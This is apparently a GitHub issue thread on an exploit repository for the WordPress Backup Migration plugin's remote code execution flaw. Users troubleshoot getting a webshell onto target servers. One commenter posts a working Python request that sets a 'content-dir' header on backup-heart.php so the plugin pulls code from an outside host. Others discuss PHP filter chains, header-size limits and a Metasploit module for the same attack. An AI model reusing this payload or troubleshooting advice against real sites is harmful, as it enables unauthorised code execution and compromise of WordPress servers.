Chocapikk
commented
9 months ago Yeah I have to add more checks in the code. Not yet reliable enough. It's a v1. I will take care of it soon. Thanks for the feedback
Open zzZxby opened 9 months ago
Chocapikk
commented
9 months ago Yeah I have to add more checks in the code. Not yet reliable enough. It's a v1. I will take care of it soon. Thanks for the feedback
Chocapikk
commented
9 months ago I just got it. I assume you are using Windows. Due to the headers length limit I use a system command to write the webshell. Except it's a linux command and not windows. That's why it's not working here. And I only check the status code and not the length of the content of /includes/backup-heart.php to verify that the characters are correctly written on the server
zzZxby
commented
9 months ago I've fixed this, thank you very much
Chocapikk
commented
9 months ago Can you make a PR or share what you did? I could also modify for windows ^^ Thanks
zzZxby
commented
9 months ago I wrote a simple Python script to send packets myself and didn't use your exploit.
zzZxby
commented
9 months ago import requests
url = 'http://172.18.1.141:80/wordpress/wp-content/plugins/backup-backup/includes/backup-heart.php' content_dir = 'http://172.18.1.2:8000/'
headers = {'content-dir': content_dir} response = requests.post(url, headers=headers)
print(response.text) # 处理响应数据
zzZxby
commented
9 months ago thank you very much again
Chocapikk
commented
9 months ago Oh ok I understand you used a remote URL to use a shell. Yeah, great. Not sure if it will work with all web server configs. Thanks also
N00BIER
commented
7 months ago Guys, any reason filter chain might not work (other than http header size limit)? Web Server - Apache 2.4/Ubuntu 22.04 Plugin - 1.3.6/1.3.7
I get 200 response but nothing really happens in the end.
Chocapikk
commented
7 months ago Okay. Well, it's surprising, was a file still written to your lab? Recently I modified to native php for the payload and it worked. With lack of information I can't know.
N00BIER
commented
7 months ago Okay. Well, it's surprising, was a file still written to your lab? Recently I modified to native php for the payload and it worked. With lack of information I can't know.
Nothing gets uploaded to /includes. I've also increased the limit of http header size... I am using web server (Apache 2.4) in docker container listening to http://X.X.X.X:8000. Wordpress 6.0.1 with Backup Migration 1.3.7
Chocapikk
commented
7 months ago Honestly, I don't have a solution at this point. It's already complicated enough to exploit. Feel free to debug if you have a solution I will update it. There was recently a metasploit module that does this. Have you tried with that too?
N00BIER
commented
7 months ago For some reason metasploit (Kali) fails to load the module multi/http/wp_backup_migration_php_filter. The framework is up to date v6.3.51-dev
Chocapikk
commented
7 months ago Okay, so I have no idea either. Open an "issue" to metasploit in this case. Sorry
N00BIER
commented
7 months ago no problem, I'll get back if any findings
I used version 1.3.6 of backup-backup for testing, but it returned a 404 error and the Trojan horse was not successfully uploaded. What could be the reason for this?
